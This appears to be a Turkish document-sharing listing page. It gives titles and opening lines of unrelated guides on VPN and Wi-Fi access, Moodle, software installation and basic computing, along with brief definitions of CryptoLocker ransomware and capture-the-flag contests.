SAÜ BİLGİSAYAR VE BİLİŞİM BİLİMLERİ FAKÜLTESİ ORTAK BİLGİSAYAR DERSLERİ KOORDİNATÖRLÜĞÜ HAFTA 1 İÇERİĞİNE AİT UYGULAMA FÖYÜ Ek Uygulama 1. Bilgisayar temel bileşenlerinin öğrenilmesi, Windows işletim sisteminde
KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER
KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB Tarih: 29/01/2013 Versiyon Tarih Açıklama 1.0 29-01-13 İlk yazımı İÇİNDEKİLER 1. AMAÇ... 1-2 2. SSLVPN BAĞLANTI ADIMLARI... 2-2 2.1 Linux
ÖĞRENCİLER İÇİN ÖĞRENME YÖNETİM SİSTEMİ KULLANMA KILAVUZU
ÖĞRENCİLER İÇİN ÖĞRENME YÖNETİM SİSTEMİ KULLANMA KILAVUZU ÖĞRENME YÖNETİM SİSTEMİ MOODLE Öğrenme Yönetim Sistemleri, Ağ üzerinden eş zamanlı olmayan öğrenme materyali sunma, sunulan öğrenme materyalini
Uzaktan Eğitim Programlarına Giriş Kılavuzu
Uzaktan Eğitim Programlarına Giriş Kılavuzu Bu kılavuzda, sizlere Uzaktan Eğitim Bölümüne Android işletim sistemi yüklü cihazlar kullanarak E-Nocta sistemine girişi anlatacağız. 1- İlk olarak cihazın Google
http://www.microsoft.com/visualstudio/eng/downloads
Visual Studio 2012'nin kurulumunu, Visual Studio'nun kullanımını ve Windows Store'da basit bir proje hazırlanmasını anlatacağım. Hepsinden önce Visual Studio ortamından biraz bahsedelim. Visual Studio
HĠTĠT ÜNĠVERSĠTESĠ REKTÖRLÜĞÜ BĠLGĠ ĠġLEM DAĠRE BAġKANLIĞI
HĠTĠT ÜNĠVERSĠTESĠ REKTÖRLÜĞÜ BĠLGĠ ĠġLEM DAĠRE BAġKANLIĞI Üniversitemiz FTP sunucusuna bağlanma, Windows 8 ve Office 2013 (Ġngilizce) kurulum dosyalarının indirilmesi ve Windows 7 ve Office 2010 un Windows
Kets DocPlace LOGO Entegrasyonu
Kets DocPlace LOGO Entegrasyonu Kets DocPlace Kurulumu Öncesinde Yapılması Gereken İşlemler Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 veya daha yeni işletim sistemlerinde Programlar
Kurum Personeli için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu
T.C. KIRŞEHİR AHİ EVRAN ÜNİVERSİTESİ REKTÖRLÜĞÜ Bilgi İşlem Daire Başkanlığı Bilgi İşlem Daire Başkanlığı [email protected] Sayfa 1 / 7 KABLOSUZ AĞ TEKNOLOJİLERİ Üniversitemiz personellerinin taşınabilir
Şekil 1- CryptoLocker Tarafından Kullanıcılara Gönderilen Eposta
CryptoLocker Virüsü Nedir? Fidyeci (ransomware) truva atıdır [1]. Microsoft Windows işletim sistemlerini hedef alır. İnternet üzerinde ilk olarak 5 Eylül 2013 tarihinde görülmüştür [2]. CryptoLocker, virüslü
BİLGİSAYAR TEMEL KAVRAMLAR. Bilgi ve İletişim Teknolojisi Ders Notları
BİLGİSAYAR TEMEL KAVRAMLAR Bilgi ve İletişim Teknolojisi Ders Notları Temel Kavramlar Donanım: Bilgisayarın fiziksel parçalarına verilen isimdir. Yazılım: Bilgisayarın verimli şekilde kullanımını sağlayan
Şehmus POLAT Teknoloji Fakültesi
Şehmus POLAT Teknoloji Fakültesi Elektrik-Elektronik Mühendisliği CTF Nedir? Capture the Flag (Bayrağı yakala), siber güvenlik alanında düzenlenen ve katılımcıların; kriptoloji, tersine mühendislik, log
Temel Bilgisayar kullanımı
Temel Bilgisayar kullanımı Bu kısımda öğreneceğimiz bilgiler Bilgisayarı Açma Kapama Bilgisayarı yeniden başlatma Yanıt vermeyen programı kapatma Masaüstü ekranını tanıyalım Bilgisayarı Açma Reset Güç
ETA:MOBİL KURULUM TALİMATI
ETA:MOBİL KURULUM TALİMATI ETA:Mobil Kurulum Adımları Kuruluma başlamadan önce ana bilgisayarınızda kontrol etmeniz gereken minimum gereksinimler aşağıda belirtilmiştir. 1. Microsoft Windows Versiyon Kurulum
Kullanıcı Kitabı (2011)
G - S E C b y A r f T e k n o l o j i Kullanıcı Kitabı (2011) G - S E C b y A r f T e k n o l o j i İÇİNDEKİLER Genel Bakış 1 G-SEC Nedir? 1 Amaçlanan Nedir? 1 Nelere Karşı Etkili, Nasıl Çalışır? 1 Kurulum
